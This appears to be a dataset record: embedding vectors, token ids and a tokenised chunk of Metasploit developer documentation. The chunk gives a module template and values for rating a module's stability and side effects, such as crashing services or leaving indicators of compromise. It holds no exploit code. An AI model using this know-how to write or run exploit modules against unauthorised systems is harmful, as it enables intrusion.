-0.3384549617767334, -0.8571686148643494, -0.2202640175819397, -0.24725480377674103, -0.7679310441017151, -0.5750923156738281, 0.17984886467456818, 1.0248878002166748, 0.4761869013309479, 0.33922630548477173, 0.0406731516122818, -0.42544275522232056, -1.0423907041549683, 0.988652765750885, -0.44678449630737305, 0.4433436691761017, 0.6828920245170593, 0.006898772902786732, -0.10989715903997421, -0.1568988561630249, -0.14422494173049927, 0.16897709667682648, -0.44231632351875305, 0.36119991540908813, 0.41955411434173584, -0.6237903833389282, 0.6483932137489319, 0.28448575735092163, -1.0504399538040161, -1.086602807044983, -0.16963204741477966, -0.42130720615386963, -0.38886764645576477, -0.8100025653839111, -0.6919849514961243, 0.9007503390312195, -0.04539496824145317, 0.5205288529396057, -0.26254740357398987, -0.2706248164176941, 0.5850530862808228, 0.1948210746049881, -0.5162963271141052, -1.036582112312317, 0.3218606412410736, 0.3115469813346863, -0.31084293127059937, -0.28775355219841003, -0.491418719291687, 0.12761670351028442, -0.6572583317756653, -0.61513352394104, 0.7820637226104736, 0.16178517043590546, -0.4525977671146393, -0.10050200670957565, 0.07487975060939789, 0.8155030608177185, 0.0066270059905946255, 0.435208261013031, 1.1997854709625244, -0.6303263902664185, -0.800130307674408, -0.019671183079481125, -0.1272810995578766, -0.1452561765909195, 0.07908445596694946, -0.4341907203197479, 0.3498132824897766, 0.4218517541885376, 0.8798050284385681, 0.0070589748211205006, -1.1514623165130615, -0.3135144114494324, -1.4299132823944092, 0.23407894372940063, -0.05044142156839371, -1.0641909837722778, 0.0797853097319603, 0.09447586536407471, -0.5134539008140564, -0.6725512146949768, -0.4814554750919342, 0.28104934096336365, 0.40178725123405457, 0.20842128992080688, 0.1754249483346939, -0.029429670423269272, -1.096819519996643, -0.5574530363082886, -1.0704364776611328, -0.04597940668463707, 0.07500176876783371, 0.5849336385726929, -0.8950760960578918, -0.01879047602415085, -0.9186702966690063, 1.1948107481002808, -0.9018579125404358, 0.061883050948381424, -0.7779316902160645, -0.7737743258476257, 0.3953336775302887, -0.12354465574026108, -1.3487203121185303, 0.6185985207557678, 0.7982884049415588, -0.2867150604724884, 0.673422634601593, -0.9338627457618713, 0.228983074426651, 0.40529245138168335, -0.17925921082496643, 0.6724898219108582, -0.33487361669540405, -1.2836732864379883, 0.5531789660453796, 0.47308090329170227, -0.6967555284500122, 0.27484384179115295, -0.5941078066825867, -0.17795170843601227, 0.36919888854026794, 0.09265170991420746, -0.5874897837638855, 0.23922641575336456, 0.39867544174194336, 0.10660834610462189, 0.28783732652664185, 0.15959064662456512, 1.0687910318374634, 0.13094139099121094, 0.007308969274163246, 0.9582245945930481, -0.5025343298912048, -0.3478255569934845, 0.266127347946167, -0.27429845929145813, -0.3852756917476654, 0.16646309196949005, 0.5268204808235168, 0.14355140924453735, -0.21357227861881256, -0.22260189056396484, -0.08807194977998734, 1.1127736568450928, 0.703545331954956, 0.6390766501426697, -0.043014850467443466, -0.8897309899330139, -0.25536879897117615, -0.47802290320396423, -1.1295543909072876, -0.36062416434288025, 0.3741176426410675, -0.3391002416610718, 0.2278900295495987, -0.4922896921634674, -0.7459964156150818, 0.3958004117012024, -0.06046879291534424, 0.844291090965271, 0.001305907964706421, 0.622412383556366, 0.07322049140930176, 0.45739343762397766, -0.7064641714096069, -0.14171500504016876, 0.5341347455978394, 0.6999192237854004, -0.6544503569602966, -0.5003212094306946, -0.03298048675060272, 1.5230798721313477, -0.3529173731803894, -0.4275135099887848, -0.01802145130932331, -0.31440186500549316, 0.2559921145439148, 0.4144122302532196, -0.4915766716003418, -0.4637807607650757, 0.04778215289115906, 0.19683881103992462, -1.1442774534225464, 0.6245322823524475, -0.6115232110023499, 0.11201034486293793, -0.20214414596557617, -0.21259698271751404, -0.5588063597679138, 0.5373351573944092, 0.4760896861553192, -0.32287469506263733, 0.29489666223526, 0.2194242626428604, 0.23610417544841766, -0.6280176043510437, -0.1851017326116562, 0.7419429421424866, 0.7729834318161011, 0.6583071947097778, 0.44018134474754333, -0.007452258374541998, 0.13875342905521393, 0.859516441822052, 0.1415260136127472, -0.44050902128219604, 0.7683927416801453, 0.9189651012420654, -0.21700043976306915, -0.13306379318237305, -0.08269961923360825, 0.2293386161327362, -0.5045772790908813, 0.01598023623228073, 0.6316450834274292, 0.024929769337177277, 0.4696364402770996, -0.1030087023973465, -0.08048132807016373, 0.06067732349038124, -0.7135936617851257, -0.7426544427871704, -0.053327303379774094, 0.4139212965965271, 0.8293623924255371, -0.08668449521064758, 0.00046053226105868816, -0.18285022675991058, 0.611234724521637, 0.5696255564689636, 0.25739437341690063, 0.10935968905687332, 0.5249122381210327, 0.6824008226394653, -0.545818567276001, 0.28542470932006836, -0.22381891310214996, 0.5438928604125977, -0.107929527759552, -1.120452642440796, -0.25797247886657715, 0.49550938606262207, -0.10687533020973206, 0.6196284890174866, -0.26042330265045166, -1.2350715398788452, 0.1760251522064209, -0.5133929252624512, 0.3268651068210602, -0.20269319415092468, -0.39216065406799316, 0.6109990477561951, -0.2821907699108124, -0.4936777651309967, 0.10323183983564377, 0.19208215177059174, 0.4583111107349396, 0.8665461540222168, 0.9102053642272949, -0.39097025990486145, 1.2346136569976807, 0.4741637110710144, -0.14961746335029602, -0.005517446435987949, 0.5266441106796265, -0.3357267379760742, -0.4122790992259979, -0.0762915387749672, 0.012915199622511864, 0.57371985912323, -0.0006427859771065414, -0.33821189403533936, 0.8409715890884399, 0.18294723331928253, 0.007831909693777561, -0.4054347574710846, -0.6109918355941772, 0.5894551277160645, -0.8671683669090271, 0.026032092049717903, 0.2716169059276581, 0.37535855174064636, 0.26241785287857056, -0.3255912661552429, -0.6552041172981262, -0.54976886510849, 0.7036617994308472, 0.009897866286337376, 0.4780721068382263, 0.3250982165336609, -0.4087349772453308, -0.28886666893959045, -0.847324013710022, -0.37984558939933777, 0.1063125804066658, -0.01922382228076458, -0.20242619514465332, -0.14585046470165253, -0.09170472621917725, 0.7378197908401489, 0.5219857692718506, -0.4546244740486145, -0.16947388648986816, 0.6240045428276062, 1.2068917751312256, -0.41662001609802246, 1.0799795389175415, 0.2695746123790741, 0.28213369846343994, -0.25961577892303467, -0.28075292706489563, 0.8346935510635376, -0.23195888102054596, -0.32437384128570557, -0.07360430061817169, 0.13718603551387787, 0.2858368456363678, -0.7537830471992493, -0.04493340104818344, 0.7910996675491333, -0.025428304448723793, 0.4317918121814728, 0.40754809975624084, -0.6121929287910461, -0.9310797452926636, -0.022202424705028534, -1.3641482591629028, 0.006122804246842861, -0.6433975696563721, -0.5282515287399292, -0.41149088740348816, -0.9996328353881836, 3.9328553676605225, 1.2448183298110962, 1.3816375732421875, -0.11466340720653534, 0.014035582542419434, 1.3324748277664185, 0.47158652544021606, 0.031290169805288315, 0.5006802678108215, -1.0982409715652466, -0.22008958458900452, 0.014380688779056072, -0.3606065511703491, 0.6103660464286804, -0.2666667699813843, 0.7558642029762268, -1.0748640298843384, 0.6223911046981812, 0.1321619302034378, -0.6071272492408752, -1.1214805841445923, -0.25258561968803406, -0.401807576417923, 0.5362733006477356, -0.31346461176872253, -0.17928056418895721, 0.015445698983967304, -0.8367971181869507, 0.4302358031272888, -0.7355207204818726, -0.39592358469963074, -0.7163152098655701, 0.6828160285949707, 0.15530076622962952, 0.23447011411190033, 0.7799347043037415, 0.5600423216819763, -0.012801684439182281, 0.17171989381313324, -0.22145581245422363, 0.42966151237487793, -0.8947219848632812, 0.07168575376272202, -0.0966114029288292, 0.09675491601228714, 0.21182756125926971, -0.6178261041641235, -0.08526738733053207, 0.5959005951881409, -0.11115915328264236, 0.8636910319328308, -0.7942216992378235, 0.20338764786720276, -1.0726029872894287, -0.70768141746521, 0.5322597622871399, -0.3860408365726471, -0.6889316439628601, 0.46008414030075073, -0.7049282193183899, 0.023095929995179176, -0.5523554086685181, -0.7392476201057434, 0.012143531814217567, 0.1730905920267105, 0.26326417922973633, 0.29068994522094727, 0.1819133311510086, -0.12139960378408432, -0.48273319005966187, -0.1716289520263672, 0.2911722660064697, -0.8815125226974487, -0.5995453596115112, 0.11550800502300262, 0.042587634176015854, -0.26364484429359436, 0.2570355534553528, 0.09345974028110504, -0.1737349033355713, 0.35464003682136536, 0.0093457642942667, -0.029367785900831223, -0.3077707290649414, 0.2834910452365875, 0.6672002077102661, -0.9475281238555908, -0.033843524754047394, 0.30554085969924927, -0.2562287151813507, 0.614547073841095, 1.3421779870986938, 0.1128518208861351, 0.2976215183734894, 0.09906038641929626 ]
[ 101, 2795, 1997, 8417, 6210, 1997, 11336, 15258, 2217, 3896, 1998, 9211, 2129, 2000, 2224, 2951, 23809, 2063, 7047, 11336, 4431, 8909, 4765, 28295, 5963, 2000, 2327, 102 ]
metasploit
114.txt
0
[CLS] new metasploit modules are now required to contain a notes section containing additional information such as the stability, reliability and sideeffects associated with running the module. example : def initialize ( info = { } ) super ( update _ info ( info,'name'= >'module name ','description'= > % q { module description },'author'= > ['author name'],'license'= > msf _ license,'references'= > [ ['cve ','2020 - xxxx'] ],'disclosuredate'= >'2020 - 03 - 26 ','platform'= >'ruby ','arch'= > arch _ ruby,'privileged'= > false,'targets'= > [ ['automatic ', { } ] ],'defaulttarget'= > 0, # all new modules must contain the below information. see below for more details for allowed values'notes'= > {'stability'= > [... ],'reliability'= > [... ],'sideeffects'= > [... ] } ) ) end allowed values stabilityconstantdescriptioncrash _ safemodule should not crash the service or oscrash _ service _ restartsmodule may crash the service, but it will restartcrash _ service _ downmodule may crash the service, and remain downcrash _ os _ restartsmodule may crash the os, but it will restartcrash _ os _ downmodule may crash the os, and remain downservice _ resource _ lossmodule causes a resource to be unavailable for the serviceos _ resource _ lossmodule causes a resource to be unavailable for the os side effectsconstantdescriptionartifacts _ on _ diskmodule leaves a payload, a dropper, etc, on the target machineconfig _ changesmodule modifies some config fileioc _ in _ logsmodule leaves an indicator of compromise in the log ( s ) account _ lockoutsmodule may cause an account to lock outscreen _ effectsmodule shows something on the screen that a human may noticephysical _ effectsmodule may produce physical effects in hardware ( examples : light, sound, or heat ) audio _ effectsmodule may cause a noise ( examples : audio output from the
[ -0.3104844391345978, -0.4475347101688385, -0.057362139225006104, 0.503918468952179, -0.5355632901191711, 0.011895110830664635, -0.2431674301624298, 0.09396045655012131, 0.5394110679626465, 0.44556206464767456, 0.1276496797800064, -0.2923434376716614, 0.09739701449871063, -0.1322408765554428, -0.7330138087272644, -0.3718475103378296, -0.47075924277305603, -0.6198238134384155, -1.1074144840240479, -0.006939390674233437, -0.3740815818309784, 0.04726568982005119, -0.9766672849655151, -1.1428134441375732, -0.016866693273186684, 0.7515199780464172, 0.22482308745384216, -0.26500019431114197, 0.8797778487205505, 0.5997902154922485, 0.33196306228637695, -0.1918652504682541, -0.4059469401836395, -0.4012090861797333, 0.24082280695438385, -0.08261452615261078, 0.7402413487434387, -0.37929853796958923, 0.21207423508167267, -0.6297346949577332, 0.41876307129859924, -0.5909320116043091, 0.5421638488769531, 0.015101281926035881, -0.005368265323340893, -0.6304090023040771, -0.09009212255477905, 0.02478322945535183, 0.5408487319946289, -0.5640751123428345, 0.6670987010002136, 0.02209503948688507, 0.15314233303070068, 0.3529081344604492, -0.03703467920422554, 0.038447119295597076, 0.14053580164909363, 0.289804071187973, -0.4673750400543213, 0.4126555025577545, -0.32234886288642883, 0.029611928388476372, 0.825321614742279, -0.6351640820503235, -0.18785229325294495, 0.4287508726119995, 0.12118637561798096, -0.8437805771827698, -0.4198289215564728, -0.33983930945396423, -0.16843925416469574, 0.8888086080551147, -0.49611109495162964, -0.36668047308921814, -0.81026691198349, -0.008232587948441505, -0.08587803691625595, -0.3124932646751404, -0.3562335669994354, 0.2734393775463104, -0.28560516238212585, 0.5704450011253357, 0.11139316111803055, 0.1461179107427597, -0.26963651180267334, -0.5255672335624695, 0.20672854781150818, 0.15507665276527405, -0.4543543756008148, 0.26019740104675293, 0.28699439764022827, 0.4158737361431122, -0.6139723658561707, -0.2405209094285965, 0.21792170405387878, 0.18576262891292572, -0.24870972335338593, 0.22927922010421753, 0.17686666548252106, 0.010872209444642067, 0.4071667194366455, 0.4769364893436432, 0.10498391091823578, 0.560085117816925, -0.4459146559238434, 0.36039090156555176, 0.1460171341896057, 0.01045068446546793, -0.24891668558120728, -0.5656160712242126, 0.5310532450675964, 0.23003830015659332, 0.1440540999174118, -0.5849198698997498, -0.5397600531578064, 0.38654202222824097, 0.4993663728237152, -0.08298314362764359, -0.32447779178619385, 0.5498565435409546, -0.23375482857227325, -0.5774319767951965, 0.06596875190734863, -0.24972359836101532, -0.15321014821529388, 0.3118914067745209, 0.07369504868984222, 0.5426616668701172, -0.7220969796180725, 0.010341521352529526, -0.15076202154159546, -0.4437541365623474, 0.058239810168743134, 0.42956557869911194, -0.198723703622818, 0.1521882861852646, 0.19345860183238983, 0.4873955547809601, 0.5365384817123413, -0.9600986242294312, 0.023631758987903595, 0.24652099609375, 0.1347333937883377, 1.254776954650879, 0.4953082203865051, 0.330514520406723, -0.04912630096077919, 0.06723441183567047, -0.5991252660751343, 0.1486503779888153, -0.27812546491622925, -0.01842615380883217, 0.5199306607246399, -0.10010829567909241, -0.6835715770721436, -0.20838631689548492, -0.7117629647254944, 0.03923795372247696, -0.3087976574897766, 0.3274587392807007, 0.04919331893324852, 1.441760540008545, -0.07924126088619232, -0.0048646098002791405, -0.3554380536079407, -0.22769877314567566, -0.21831315755844116, -0.5329310297966003, -0.12327776849269867, -0.3453112840652466, 0.21587297320365906, 0.44442492723464966, 0.0283364187926054, 0.1393316090106964, 0.9162184000015259, 0.4847099184989929, -0.03015669248998165, -0.2731039226055145, 0.45593273639678955, 0.7666566967964172, -0.6913803815841675, 0.5314130783081055, 0.4550724923610687, 0.7260037660598755, 0.19827726483345032, 0.2824643850326538, -1.0121818780899048, -0.6005992293357849, -0.19158165156841278, -0.10590027272701263, -0.3710983097553253, 0.673514723777771, -0.615862250328064, 0.6521500945091248, 0.7686326503753662, -0.2923316955566406, -0.8465335965156555, -0.30977487564086914, -0.02462650276720524, -1.6210331916809082, -0.991004228591919, 0.5979229211807251, -0.69251948595047, 0.6825266480445862, -0.7258623242378235, 0.040774453431367874, 0.5536972284317017, 1.2884901762008667, 0.20708630979061127, 0.5824589133262634, 0.6357316970825195, -0.04871901124715805, -0.4109470844268799, 0.14769765734672546, 0.06297338753938675, -0.6322037577629089, -0.22585132718086243, 0.5662292242050171, -0.20142699778079987, 0.18286997079849243, -0.0774117112159729, 0.339202344417572, 0.4062013030052185, 0.35121116042137146, -0.20552167296409607, -0.4669613242149353, 0.44798052310943604, 0.34191349148750305, -0.21390411257743835, 0.0809345468878746, -0.2143200784921646, 0.8778647780418396, 0.23902826011180878, 0.9870884418487549, 0.44327908754348755, -0.4650368392467499, 0.025802189484238625, 0.42258110642433167, -0.005491576623171568, 0.23122310638427734, 0.39189112186431885, 0.6102480888366699, 0.6781409978866577, 0.4174709618091583, 0.5350533127784729, 0.6780474185943604, 0.29438742995262146, -0.19336818158626556, -0.12295261770486832, 0.4668450951576233, 0.38305872678756714, 0.9323083758354187, 0.3593215346336365, -0.34157606959342957, -0.5801964998245239, -0.029461132362484932, 0.49211299419403076, 0.3885970711708069, -0.5624752640724182, -0.8259427547454834, 0.06287502497434616, 0.20435209572315216, -0.6627015471458435, -0.28964927792549133, 0.26857513189315796, 0.1853138953447342, -0.14219269156455994, 0.16095691919326782, -0.15471196174621582, -0.987186849117279, -0.472347617149353, -0.4609408676624298, -0.8757079839706421, -0.6221325993537903, -0.602885901927948, 0.1374223232269287, 0.8760181069374084, -0.41163042187690735, 0.8444095253944397, 0.047916390001773834, -0.6012595295906067, 0.04700441285967827, -0.0493912436068058, 0.6970525979995728, 0.06918347626924515, 0.13959470391273499, -0.6533031463623047, -0.05688920617103577, 0.050365183502435684, 0.456792950630188, -0.3948715925216675, -0.4537005126476288, -0.05420995503664017, -0.11210522800683975, 0.04213143512606621, 0.08987997472286224, 0.8116388320922852, -0.1507984846830368, -0.08487988263368607, -0.4870530366897583, 0.21379636228084564, -0.14335377514362335, 0.258960485458374, 0.16562971472740173, -0.40271613001823425, 0.5020774006843567, -0.5150988101959229, 0.22397670149803162, -0.008500413969159126, 0.6370765566825867, -0.4600559175014496, 0.5199567079544067, -0.5562336444854736, 0.548565685749054, -0.6505423784255981, 0.7127988934516907, 0.1233549490571022, -0.02730305679142475, 0.4306853115558624, 0.21360720694065094, 0.060703132301568985, -0.7136815786361694, -0.2122255563735962, -0.682141900062561, -0.35401585698127747, 0.15809373557567596, 0.6529616713523865, -0.8159180283546448, 0.6141744256019592, -0.42285963892936707, -0.2325238287448883, -0.03335137665271759, 0.008768977597355843, 0.4256496727466583, 0.25259244441986084, 0.1497873067855835, -0.003960789646953344, -0.09381721168756485, 0.4265967011451721, -0.262499064207077, 0.29158395528793335, -0.5314915776252747, 0.16170135140419006, 0.7399242520332336, -0.5691577196121216, 0.9088571071624756, 0.3690376579761505, 0.03443172201514244, -0.9155786037445068, 0.29559963941574097, -0.9410728216171265, -0.2534160017967224, 0.7809228897094727, 0.24906907975673676, -0.04566861316561699, 0.7707371711730957, -0.4809444546699524, -0.389911413192749, 0.2287849485874176, -0.0400601327419281, 0.2003113329410553, -0.145554780960083, 0.012093054130673409, -0.11039040982723236, -0.34745678305625916, -0.3388967216014862, 0.09535198658704758, 0.44334515929222107, -0.002887363312765956, 0.028382260352373123, 0.9774134159088135, 0.1791488528251648, -0.3582783043384552, 0.28711050748825073, -0.40454041957855225, -0.3421150743961334, 1.2633771896362305, -0.1257166713476181, 0.1887027472257614, -0.22643862664699554, 0.5219741463661194, 0.06689158082008362, 0.4426712393760681, 0.12025372684001923, -0.4302113652229309, 0.1316070705652237, -0.3752690553665161, -0.5542116165161133, 0.0609055794775486, -0.6502914428710938, -0.01803160458803177, -0.037843674421310425, 0.5127916932106018, -0.3438049554824829, -0.3402901291847229, -0.6824362277984619, 0.5067138671875, 0.8873526453971863, 0.6463518142700195, 0.4640291929244995, 0.8365491032600403, 0.020708082243800163, -0.242597758769989, 0.07848622649908066, -0.3309091329574585, 0.4970344305038452, 0.008727507665753365, 0.5976902842521667, 0.09014632552862167, -0.03829221427440643, -0.5382553935050964, -0.1361764818429947, -0.7131420373916626, -0.22176377475261688, 0.5316400527954102, 0.20524297654628754, -0.3499094843864441, -0.21691930294036865, 0.09440156072378159, -0.27761027216911316, -0.3490985035896301, 0.20542076230049133, -0.14885050058364868, 0.28003209829330444, 0.2945181727409363, -0.8658013343811035, 0.39880189299583435, -1.2362475395202637, 0.5040929317474365, 0.24680040776729584, -0.2086864858865738, 0.13956192135810852, -0.8765789270401001, 0.31068575382232666, -0.3109099566936493, 0.025063181295990944, -0.1668514758348465, 0.24549579620361328, 0.1408793181180954, -1.113260269165039, 0.22573906183242798, 0.4180634617805481, -0.6131625175476074, -0.39285123348236084, 0.005693989340215921, 0.06827101856470108, 0.4910795986652374, 0.10765687376260757, 0.11674990504980087, -0.5709161162376404, 0.3745577037334442, -0.8631778359413147, 0.643191397190094, -0.8951219916343689, 0.3416444957256317, 0.7101147770881653, -0.06457303464412689, -0.32792291045188904, -0.14641660451889038, -0.6191468834877014, -0.24408404529094696, -0.4010474681854248, 0.021184008568525314, 0.020783038809895515, 0.1985880583524704, 1.0851924419403076, 0.29669061303138733, -0.28648728132247925, 0.6100798845291138, 0.6071494817733765, -0.4067493677139282, -0.005442487075924873, -0.14404205977916718, -0.12232360243797302, 0.3886655271053314, -1.062161922454834, 0.12843471765518188, 0.16469022631645203, -0.19576579332351685, 0.451552152633667, -0.6684960722923279, 0.8105711936950684, -0.23630882799625397, -0.44403913617134094, -0.7037628293037415, -0.6320445537567139, 0.042542822659015656, 0.38559597730636597, -0.414414644241333, 0.41438519954681396, 0.06122265011072159, -0.40823623538017273, -0.09729978442192078, 0.06306692212820053, -0.8240254521369934, -0.9514114260673523, -0.21649979054927826, -0.014601049944758415, -0.17142930626869202, -0.1437426060438156, 0.5105525851249695, -0.259561151266098, -0.7846072912216187, 0.7276656031608582, -0.4034120440483093, 0.37585097551345825, -1.0195213556289673, -0.3839999735355377, -0.8240386843681335, -0.10671491920948029, 0.24459831416606903, 0.5683692097663879, -0.4603753089904785, 0.4921775162220001, 0.40214064717292786, 0.12450577318668365, 0.39604249596595764, -0.2839503586292267, -0.3751457929611206, 0.627417802810669, -0.01446488406509161, -0.6483516693115234, -0.14626631140708923, 0.6885692477226257, -0.5664960145950317, -0.017557652667164803, -0.26208868622779846, -0.5420889258384705, -0.6135055422782898, -0.4526859521865845, -0.1923760175704956, -0.0992649495601654, 0.3135862946510315, -0.6799831986427307, 0.1058836355805397, -0.38399556279182434, -0.10336605459451675, 0.1000174880027771, -0.6637402772903442, 0.2580379545688629, -0.04092005267739296, -0.03741014376282692, -0.11220235377550125, -0.11461878567934036, -0.3907572329044342, -0.842449963092804, -0.26774898171424866, 0.791966438293457, -0.2356557697057724, 0.09169331192970276, 0.10265529155731201, -0.3046890199184418, 0.4984896779060364, 0.3578663766384125, -0.1757495105266571, -0.28030186891555786, 0.07975424081087112, -0.06989406794309616, 0.13605570793151855, 0.407675176858902, -0.11896287649869919, 0.6097673773765564, -0.8204089403152466, 0.2513338625431061, 0.39002516865730286, 0.09301760792732239, 0.5857816934585571, 0.001055626547895372, 0.8088575005531311, -0.43710970878601074, -0.08079762756824493, 0.21012479066848755, 0.3608945608139038, 0.3368828296661377, -0.3282444179058075, -0.21304646134376526, -0.11834476888179779, -0.48868328332901, -1.347280502319336, 0.3477860987186432, 0.1728011667728424, -0.6996690630912781, 0.41003552079200745, 0.19959306716918945, 0.7076736688613892, 0.019466735422611237, 0.04792505130171776, 0.829574704170227, 0.2421320676803589, -0.2953251302242279, -0.46496015787124634, 0.5523229241371155, 0.18521195650100708, 0.5204075574874878, 0.16946662962436676, -0.24858592450618744, -0.3568030595779419, 0.01112873014062643, -0.23407413065433502, -0.13412253558635712, -0.9743266105651855, -0.3273584842681885, 0.8448710441589355, -0.16461095213890076, 0.583286702632904, -0.2562873363494873, -0.8296864628791809, -0.5421510934829712, 0.2935918867588043, -0.18798035383224487, -0.3523761034011841, 0.6736457943916321, 0.023110685870051384, 0.2995002269744873, -0.44283613562583923, 0.7351627945899963, -0.44276225566864014, 0.007848457433283329, 0.5709478855133057, 0.1339201033115387, -0.7386607527732849, 0.6784642934799194, 0.6662042140960693, -0.7097184062004089, -0.25023695826530457, -1.0223033428192139, -0.7794641256332397, -0.049211591482162476, -0.44752830266952515, -0.5830874443054199, 0.3674464523792267, -0.006590196862816811, -0.2950632572174072, 0.3378360867500305, -0.24582348763942719, 0.40103137493133545, -0.7336857318878174, 0.21772301197052002, -0.1799696981906891, 0.1865576207637787, 0.9115685820579529, -0.6469647884368896, -0.16702336072921753, -0.47768014669418335, -0.2738032937049866, 0.0007412551203742623, -0.15716223418712616, 0.6713153123855591, -0.06934627890586853, 0.6021713018417358, -0.11941731721162796, 0.009551571682095528, 0.3031998872756958, -0.6875326037406921, 0.4012730121612549, 0.6727193593978882, 0.35886502265930176, -0.30315232276916504, -0.8668432831764221, 0.15472324192523956, 0.0748848021030426, 0.41988641023635864, -0.6001200079917908, -0.2556048035621643, 0.05388212203979492, -0.07967159152030945, -0.05637094005942345, -0.47712844610214233, -1.2707901000976562, -0.9210200309753418, -0.21017341315746307, 0.2701835334300995, -0.15945550799369812, -0.042129311710596085, -0.25046011805534363, -0.14207009971141815, -0.19921743869781494, -0.2999805212020874, 0.18962238729000092, -0.3039710521697998, 0.414506733417511, -0.058266445994377136, 0.17616970837116241, -0.6676933169364929, -0.5742390751838684, -0.7966886758804321, -0.6992295980453491, -0.30990996956825256, -0.5060181617736816, -0.30928388237953186, 0.21506625413894653, -0.7660053968429565, 0.808548629283905, -0.3585343360900879, 0.042113255709409714, 0.32441359758377075, -0.0382818877696991, 0.3491232395172119, 0.6821714043617249, -1.0892400741577148, 0.6378865242004395, -0.014626609161496162, 0.22804920375347137, 0.1377803534269333, -0.4965761601924896, -0.41305631399154663, 0.1918625682592392, 0.10721290111541748, 0.12631455063819885, -0.006961479317396879, -0.8245728015899658, 0.06420653313398361, 0.0512748546898365, -0.4658014476299286, -0.23820598423480988, -0.5550957322120667, 0.5940870642662048, 0.44501954317092896, -0.48786020278930664, 0.2708640694618225, 1.3218786716461182, -0.0098723154515028, 0.5500137209892273, -0.9566384553909302, 0.2722817063331604, 0.6223994493484497, 0.07011565566062927, 0.5107141733169556, 0.2891657054424286, 0.29718896746635437, -0.43977129459381104, 0.18652348220348358, 0.2353789508342743, -0.3021836578845978, 0.8647605180740356, 0.03534461185336113, 0.6626285910606384, -0.14716024696826935, -0.44495588541030884, 0.4894520044326782, 0.31526651978492737, 0.233577698469162, -0.25031402707099915, 0.2285989224910736, -0.3565691411495209, -0.6139969825744629, -0.32485339045524597, -0.6010599732398987, 0.03558535501360893, 0.4387861490249634, 0.0386819913983345, -0.003253978444263339, -0.34688976407051086, -0.45417794585227966, 0.023561183363199234, 0.1049441397190094, 0.01810191385447979, 0.28375011682510376, -0.30681943893432617, -0.3682122528553009, 1.0923148393630981, -0.08873145282268524, -0.0646568089723587, -0.5299157500267029, 0.33966925740242004, -0.5046318769454956, -0.7214937210083008, 0.08842042088508606, 1.0733224153518677, 0.4679313600063324, 0.10113725811243057, -0.21954959630966187, -0.07091405987739563, -0.11263605207204819, -0.007754168473184109, -0.1763078272342682, 0.26617586612701416, -0.6258074045181274, 0.2257908135652542, -0.1975611448287964, -0.05554603040218353, -0.05250529572367668, 0.1411178708076477, -0.21953998506069183, -0.3594666123390198, -0.2087138444185257, 0.14092525839805603, -0.13912098109722137, 0.37908244132995605, 0.8000063300132751, 0.34110724925994873, 0.3417506515979767, -0.9148346185684204, 0.0877591073513031, -0.19879980385303497, 0.29980552196502686, -0.13424646854400635, 0.4827153980731964, 0.15909618139266968, 0.6529430747032166, 0.836557924747467, -1.177608609199524, 0.08962906152009964, 1.1102651357650757, -0.15747445821762085, -0.20548872649669647, 0.36429551243782043, 0.13654956221580505, 0.3053995966911316, 0.2720344662666321, -0.29270249605178833, 0.3393930196762085, 0.3516431152820587, -0.016565831378102303, 0.2826211750507355, 0.22112715244293213, 0.737511157989502, -0.3827633559703827, 0.3487702012062073, -0.6653524041175842, 0.16414707899093628, 0.38580018281936646, 0.006681497674435377, -0.8499403595924377, 0.6920103430747986, 1.2437516450881958, -0.13811929523944855, -0.36941608786582947, 0.5733709335327148, -0.10965559631586075, 0.465131938457489, -0.16922786831855774, 0.055931456387043, 0.3014974296092987, 0.24398136138916016, 0.17841699719429016, -0.4183172285556793, -0.3565426468849182, 0.3203437626361847, -0.11914467811584473, 0.3853466212749481, -0.01714540645480156, 0.03970161825418472, 0.5901638269424438, -0.4432115852832794, 0.2474062442779541, -0.40588662028312683, 0.3769420385360718, 0.3537026345729828, -0.38039013743400574, -0.3626359701156616, 0.7487174868583679, 0.32978013157844543, 0.9610353708267212, 0.0662018284201622, 1.130502462387085, -0.2014373540878296, -0.3309970498085022, 0.3711789846420288, -0.20259754359722137, -0.46814870834350586, -0.1996167004108429, -0.45639416575431824, -0.6391696333885193, 0.48365068435668945, -0.38394150137901306, 0.49880683422088623, 0.11246645450592041, -0.4094799757003784, -0.715302586555481, 0.11779942363500595, -0.5287904143333435, -0.9747173190116882, 1.1109720468521118, 0.22970081865787506, -0.47624558210372925, -0.05268345773220062, -0.26470959186553955, 0.5077476501464844, 0.40574896335601807, -0.17992892861366272, -0.9535067081451416, -0.28252434730529785, 0.02851501666009426, -0.5754672288894653, 0.9097281098365784, -0.33749300241470337, -0.32902616262435913, -0.1312941163778305, -1.1663652658462524, -0.27638545632362366, -0.0633072480559349, -0.5068929195404053, -0.8858503103256226, 0.06170888617634773, 0.18861985206604004, 0.8703420162200928, 0.4257301688194275, -0.496768593788147, -0.010864024981856346, -0.003963162656873465, 0.821047842502594, 0.10894507169723511, 0.6301687955856323, -0.12650102376937866, -0.041738737374544144, -0.1284664124250412, -0.5861067175865173, 0.8201093077659607, -0.059600621461868286, 0.15732982754707336, -0.2758534550666809, -0.31412839889526367, -0.616068959236145, -0.4436704218387604, 0.4697059094905853, 0.04423350468277931, 0.3302316665649414, 0.11393414437770844, -1.2382522821426392, 0.06328502297401428, -0.6531728506088257, 0.07269717752933502, -0.5540782809257507, -0.3856358230113983, 0.4454304575920105, 0.09696505218744278, 0.43529367446899414, -1.4984253644943237, 4.501650810241699, 0.6059806942939758, 0.18073487281799316, 0.2245074212551117, -0.1335149109363556, 0.8248814940452576, 1.6070832014083862, -0.9187176823616028, -0.018541261553764343, -0.44318506121635437, -0.03443668782711029, 0.15461161732673645, 0.5475545525550842, 0.6010778546333313, 0.8998311161994934, 0.7244982719421387, -0.2294885367155075, 0.265398770570755, 0.15524107217788696, -0.7684326171875, -0.8119940757751465, -0.4726299047470093, -0.4218727648258209, 0.9953714609146118, 0.43584713339805603, 0.3226698338985443, -0.341250479221344, -0.6860960125923157, -0.10566375404596329, 0.22609877586364746, 0.14358441531658173, -0.48649588227272034, 0.10112107545137405, 0.13766078650951385, -0.6492133140563965, -0.09729335457086563, 0.09624037146568298, -1.1491508483886719, -0.577538251876831, -0.013465724885463715, 0.27924472093582153, -0.06330697983503342, 0.23778806626796722, -0.31269556283950806, 0.1602095663547516, 0.2886716425418854, -0.21504616737365723, 0.5769381523132324, 0.5921267867088318, -0.8561857342720032, 0.7343018651008606, -0.13605716824531555, 1.054816484451294, 0.3173801898956299, -0.7123624086380005, 0.3049217164516449, 0.29294148087501526, -0.3568066954612732, -0.023558592423796654, 0.3571876585483551, 0.4592747688293457, -0.5931689143180847, -0.1957920342683792, -0.07215817272663116, -0.5961782336235046, 0.8221548199653625, -0.10021209716796875, -0.1720350682735443, 